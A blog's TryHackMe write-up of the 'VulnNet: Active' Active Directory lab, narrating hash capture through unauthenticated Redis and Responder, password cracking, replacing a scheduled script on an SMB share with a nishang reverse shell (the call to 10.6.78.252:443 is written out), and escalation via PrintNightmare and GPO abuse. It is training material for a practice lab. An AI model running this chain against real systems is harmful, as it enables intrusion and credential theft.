mgarrity.com

TryHackMe - VulnNet: Active

December 03, 2023

VulnNet: Active

VulnNet: Active is a Windows machine running Active Directory with an instance of Redis that doesn't require authentication. This can be leveraged to run a command that attempts to authenticate to a Responder SMB server, resulting in the interception of an NTLMv2 hash of a user. After cracking the hash, the credentials can be used to authenticate to an SMB share that contains a PowerShell script which can be overwritten with a reverse shell script. Once on the system, enumeration can reveal two different paths to privilege escalation: one is by running a PrintNightmare exploit, and the other is by exploiting a Group Policy Object misconfiguration; both methods result in a system shell.

nmap scan:

nmap scan

Open ports:

  • 53 (DNS)
  • 135 (MSRPC)
  • 139, 445 (SMB)
  • 464 (kpasswd)
  • 6379 (Redis)

The Redis port seemed interesting, so I used redis-cli to connect to it. The info command outputted some information about the server without needing to authenticate:

redis info

I listed configuration data:

config GET *

This showed that the instance was running in the context of the enterprise-security user:

redis enterprise-security user

Redis supports scripting with Lua. In this case, it could be leveraged to attempt an authentication to an SMB server and reveal a password hash.

I started the SMB server with responder:

responder

The Redis eval command is used to invoke the execution of Lua scripts, so I used it to run dofile which tries to load and execute a file from the SMB server:

lua eval dofile

In order to retrieve the file from the server, an authentication was attempted, allowing for Responder to capture the NTLMv2 hash of enterprise-security:

NTLMv2 hash

I saved the hash in a file called hash.txt and used JtR to crack it:

crack enterprise-security password

The credentials granted read access to Enterprise-Share:

list shares

The share contained a PowerShell script, so I downloaded it:

smbclient Enterprise-Share

PurgeIrrelevantData_1826.ps1 looked to be a cleanup script for the C:\Users\Public\Documents directory:

cat PurgeIrrelevantData_1826.ps1

It's common for cleanup scripts to run as scheduled tasks, therefore, I figured that replacing it with a reverse shell script could result in a shell on the system.

So I used a nishang reverse shell and wrote it into a file called PurgeIrrelevantData_1826.ps1 and added the Invoke-PowerShellTcp -Reverse -IPAddress 10.6.78.252 -Port 443 function call:

reverse shell tcp script

Started a netcat listener:

netcat

Within smbclient, I overwrote the script with the reverse shell:

overwrite script

After about a minute, a connection was made as enterprise-security:

reverse shell as enterprise-security

While looking for paths to escalate privileges, I listed the services:

list services

Print Spooler was running which meant that the system was potentially vulnerable to PrintNightmare:

Print Spooler service

I cloned this PoC for PrintNightmare (CVE-2021-1675) which also required this version of Impacket as stated in the GitHub README. Then, I copied smbserver.py into the same directory as the exploit:

CVE-2021-1675

I used msfvenom to generate the DLL payload (shell.dll):

generate payload

Started a netcat listener:

netcat

Using smbserver.py, I started the SMB server which hosted a share named smb that contained the shell.dll payload:

start SMB server

Then, I ran the exploit which connected to the target system and attempted to execute the DLL payload hosted on the SMB server:

run exploit

SMB server showing incoming connections from the target machine:

smb server

After the exploit completed, nc caught a shell as nt authority\system:

system shell

Another method of escalating privileges is by exploiting GPO permissions. Back on the initial shell as the enterprise-security user, running net user enterprise-security showed that the only group this user had membership in was Domain Users:

net user enterprise-security

The next step was to map the domain with BloodHound in order to get a better idea of the AD environment. But first, I needed the AD data to import into BloodHound, so I started a python server which contained SharpHound:

http server SharpHound

I used certutil.exe to download SharpHound.exe onto the target machine:

download SharpHound

After running SharpHound.exe, a ZIP with the domain data was provided:

run SharpHound

I copied the BloodHound ZIP into the Enterprise-Share SMB share so I could access it locally:

copy BloodHound data into Enterprise-Share

Downloaded the ZIP using smbclient:

get BloodHound data

After importing the data into BloodHound, viewing Shortest Paths to Domain Admins showed that enterprise-security had GenericWrite on the SECURITY-POL-VN GPO which was linked to the VULNNET.LOCAL domain:

BloodHound Shortest Paths to Domain Admins

This meant that a tool like SharpGPOAbuse could be used to add enterprise-security to the Administrators group. So I started a local python server that contained SharpGPOAbuse.exe:

http server SharpGPOAbuse

Downloaded it onto the target with certutil.exe:

download SharpGPOAbuse

With SharpGPOAbuse.exe, I added enterprise-security as a local admin to the AD objects linked to the SECURITY-POL-VN GPO. In this case, the domain VULNNET.LOCAL:

add security-enterprise to Administrators

The default refresh cycle for Group Policy is about every 90 minutes, but an update can be forced with gpupdate /force:

Group Policy update

Checking group membership again showed that enterprise-security was now in the Administrators group:

Group Membership Administrators

Listing the shares confirmed administrative access:

admin access shares

Using psexec.py, I obtained a shell as nt authority\system:

system shell

CTF Writeups | InfoSec Topics

Written by Mike Garrity

Email RSS